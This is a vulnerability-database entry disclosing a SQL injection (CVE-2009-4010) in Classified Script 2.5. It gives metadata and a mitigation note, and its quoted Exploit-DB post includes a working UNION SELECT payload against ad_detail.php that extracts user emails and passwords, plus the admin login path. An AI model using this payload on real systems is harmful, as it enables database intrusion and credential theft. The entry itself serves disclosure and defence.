header-logo
Suggest Exploit
vendor:
Classified Script
by:
h0rd
9,3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Classified Script
Affected Version From: 2.5
Affected Version To: 2.5
Patch Exists: YES
Related CWE: CVE-2009-4010
CPE: a:softwaredep:classified_script:2.5
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-4010/https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-4010/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

Software DEP Classified Script 2.5 SQL Injection Vulnerability

Software DEP Classified Script 2.5 is vulnerable to a SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable script. This can allow the attacker to gain access to the database and potentially gain access to sensitive information such as usernames and passwords.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended that users upgrade to the latest version of the software.
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Software DEP Classified Script 2.5 SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Author: h0rd
Contact: h0rd[at]null.net
homepage: http://h0rd.net
download: http://www.softwaredep.com/classified-script.html
Price: $199 

PoC exploit:
http://[host]/ad_detail.php?id=null union select 1,2,3,4,concat(email,0x3a,0x3a,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 from user--

login page:
http://[host]/[script]/admin/

Navigation

Suggest Exploit

Services By CQR